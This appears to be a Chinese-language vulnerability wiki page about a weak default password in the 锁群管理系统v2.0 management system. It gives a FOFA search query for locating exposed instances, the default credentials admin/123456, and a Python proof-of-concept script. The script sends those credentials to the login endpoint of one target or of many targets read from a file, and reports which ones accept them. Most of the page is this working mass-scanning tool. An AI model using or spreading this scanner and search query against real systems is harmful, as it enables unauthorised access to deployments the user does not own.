View source for 鎖群管理系統v2.0 弱口令漏洞

==FOFA==
<pre>
title="锁群管理系统v2.0"
</pre>

==默認憑據==
用戶名：admin
密碼：123456

==POC==
<pre>
import requests
import sys
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning  #消除警告
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  # 消除警告

def lemonlove7():
    print('python xxx.py -u/--url http://xxx.xxx.xxx.xxx')
    print('python xxx.py -f/--file x.txt')
    print('FOFA:title="锁群管理系统v2.0"')
    print('lemonlove7')

if len(sys.argv)==1:
    lemonlove7()
    sys.exit()
p = argparse.ArgumentParser(description='lemonlove7')
p.add_argument('-u','--url',help='输入url',default='')
p.add_argument('-f','--file',help='输入文件',default='')
a = p.parse_args()

url = a.url

file = a.file

headers= {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',
    'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
    'Cookie':'ASP.NET_SessionId=pjb41rehvxilis32hfgus0r5'
}
if url != '':
    furl = url
    try:
        url =furl+'/inc/CheckLogin.aspx?checkLogin=login&un=admin&pw=123456'
        r= requests.get(url=url,headers=headers,timeout=10,verify=False)
        if r.status_code == 200 and '0' in r.text:
            print(furl+'存在弱口令')
        else:
            print(furl+'不存在弱口令')
    except Exception as e:
        print(furl+'不存在弱口令')

if file !='':
    text =file
    f = open(text,'r+')
    for i in f.readlines():
        url = i.strip()
        if url.startswith('http:') != 1 and url.startswith('https:') != 1:
            url = 'http://' + url
        url1 = url
        url2=url
        try:
            url1 = url+'/inc/CheckLogin.aspx?checkLogin=login&un=admin&pw=123456'
            r =requests.post(url=url1,headers=headers,timeout = 10,verify=False)
            if r.status_code==200 and '0' in r.text:
                print(url2+'存在弱口令')
            else:
                print(url2+'不存在弱口令')
        except Exception as e:
            print(url2+'不存在弱口令')
</pre>


==參考==
https://mp.weixin.qq.com/s/Xu0_SCMwhCR9Bx7mo8v1kw